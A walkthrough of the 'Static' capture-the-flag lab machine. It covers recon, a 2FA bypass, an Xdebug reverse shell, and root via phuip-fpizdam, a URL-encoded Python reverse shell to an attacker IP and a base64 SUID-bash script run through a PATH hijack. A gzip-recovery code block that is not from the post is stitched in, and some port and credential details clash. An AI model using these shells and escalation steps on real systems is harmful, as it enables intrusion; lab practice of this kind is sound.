In this post, I would like to share a walkthrough of the Static Machine.

This machine is rated Hard difficulty.

Information Gathering on Static Machine

Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

From the result, we found the following ports open:

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 8.2p1
  • 80: gunicorn

Let’s access the web interface at static.htb:8080/.ftp_uploads/

Two files are listed here.

When I try to open warning.txt

We will need to download db.sql.gz to our machine and look at what is stored inside it.

Sadly, the file is corrupted, just as warning.txt mentioned.

Let’s research how to recover the file.

The first results didn’t show anything useful. Let’s scroll down and hope to find a usable tool.

We managed to find a tool called gzrecover on GitHub.

Gaining Privileged Access on the Static Machine

The tool can be downloaded here.

Once gzrecover is fully installed, we can run it with the command sudo ./gzrecover db.sql.gz

We managed to recover the file; let’s read the recovered output.
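The post relies on gzrecover to salvage the damaged db.sql.gz. As an added example (not code from the post or from gzrecover), here is the core idea in Python’s zlib: keep whatever decompresses cleanly instead of throwing the whole file away as gzip.decompress() does. The SQL dump and both kinds of damage below are constructed for the demonstration.

```python
import gzip
import zlib
from typing import Optional, Tuple

# Constructed sample standing in for db.sql.gz: a small SQL dump, gzip-compressed,
# then damaged in two ways. gzip.decompress() rejects both outright.
SAMPLE_SQL = (
    b"CREATE TABLE users (id INT, username VARCHAR(32), password VARCHAR(64));\n"
    b"INSERT INTO users VALUES (1, 'admin', '<placeholder hash>');\n"
)
GOOD = gzip.compress(SAMPLE_SQL)
TRUNCATED = GOOD[:-12]                  # trailer and a few DEFLATE bytes cut off
BAD_TRAILER = GOOD[:-8] + b"\xff" * 8   # DEFLATE intact, CRC32/ISIZE overwritten


def stdlib_rejects(blob: bytes) -> bool:
    """True when gzip.decompress() refuses the blob and returns nothing at all."""
    try:
        gzip.decompress(blob)
        return False
    except (OSError, EOFError, zlib.error):
        return True


def recover_gzip_prefix(blob: bytes, chunk: int = 4096) -> Tuple[bytes, Optional[str]]:
    """Return (recovered_bytes, reason) for a damaged gzip stream.

    Everything decoded before the damage is kept instead of being discarded;
    reason is None only for a clean stream that ends in a valid trailer.
    """
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # gzip framing expected
    out = bytearray()
    for i in range(0, len(blob), chunk):
        snapshot = d.copy()  # so the failing chunk can be replayed byte by byte
        try:
            out += d.decompress(blob[i:i + chunk])
        except zlib.error:
            d = snapshot
            for b in blob[i:i + chunk]:
                try:
                    out += d.decompress(bytes([b]))
                except zlib.error as e:
                    return bytes(out), f"zlib error after {len(out)} bytes: {e}"
    out += d.flush()
    if not d.eof:
        return bytes(out), "stream ended before the gzip trailer (truncated)"
    return bytes(out), None
```

gzrecover goes further by skipping corrupt bytes and resyncing on a later DEFLATE block, which this does not attempt; it covers the common truncated-file and broken-trailer cases, and the returned reason tells you which one you hit.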

However, the file contains some encrypted content, but it is obvious that it holds MySQL commands. After decrypting it, you will find credentials stored there.

  • username=admin
  • password=admin

Trying to bypass 2FA authentication

From our nmap result, we notice that static.htb:8080 has a /vpn/ directory.

I found out that login.php is running in the /vpn/ directory, which leads to a login page.

Once you have entered the credentials on the login page, it redirects to a 2FA Enabled page that looks like the one shown above.

We will need to bypass the 2FA by running the command shown above.

It will show an Internal IT Support portal where you enter any name to generate a new VPN configuration, which is then downloaded to your machine.

Downloading openvpn

From the VPN file, I notice another subdomain, vpn.static.htb, written there.

Let’s use the VPN file that we downloaded previously.

We should route 172.20.0.0/24 through the OpenVPN tunnel.

We should now be able to access 172.20.0.10, which has an info.php file.

Let’s start an nc listener on our machine.

We start the exploit by running python2 exploit.py

## I have renamed the Python file to exploit.py ##

I tried the command as above, but nothing happened on my nc listener.

It works with this payload, though.

After entering the reverse shell payload, browse to 172.20.0.10/info.php?XDEBUG_SESSION_START=phpstorm

Voila! As a result, we got a reverse shell connection back to us.

Finally, we should be able to read the user flag by typing “cat user.txt”

Escalating to Root Privileges

First, we need to transfer ncat from our machine to the victim machine.

We set up port forwarding with the command ssh -N -L <anyport>:192.168.254.3:80 -i id_rsa www-data@172.20.0.10

Next, we exploit it with the command ./phuip-fpizdam http://local:<anyport>/index.php

Then we open the URL below in the browser:

localhost:<anyport>/index.php?a=/usr/bin/python3.6%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.254.2%22%2C4242))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fbash%22)%27%0A

Finally, we got the reverse shell connection back to us.

Let’s execute the following command:

echo 'IyEvYmluL2Jhc2gKL2Jpbi9jcCAvYmluL2Jhc2ggL3RtcC9iYXNoIC0tbm8tcHJlc2VydmU9YWxsCi9iaW4vY2hvd24gcm9vdDpyb290IC90bXAvYmFzaAovYmluL2NobW9kIDQ3NzcgL3RtcC9iYXNoCg==' | base64 -d > /tmp/readlink

After that, rename the readlink file to sed (the name shouldn’t matter). The base64 decodes to a short bash script that copies /bin/bash to /tmp/bash, chowns it to root and chmods it 4777, which is why a bash binary appears in /tmp/ after ersatool runs.

Once the file is renamed, run export PATH=/tmp:$PATH before proceeding with the next step.

Once that has been done, we can execute the following:

  • /usr/bin/ersatool
  • create
  • x
  • enter
  • exit

Now we should see the bash file in the /tmp/ directory.

Next, execute the bash -p command in the /tmp/ directory.

Finally, we can read the root flag by running the “cat /root/root.txt” command.
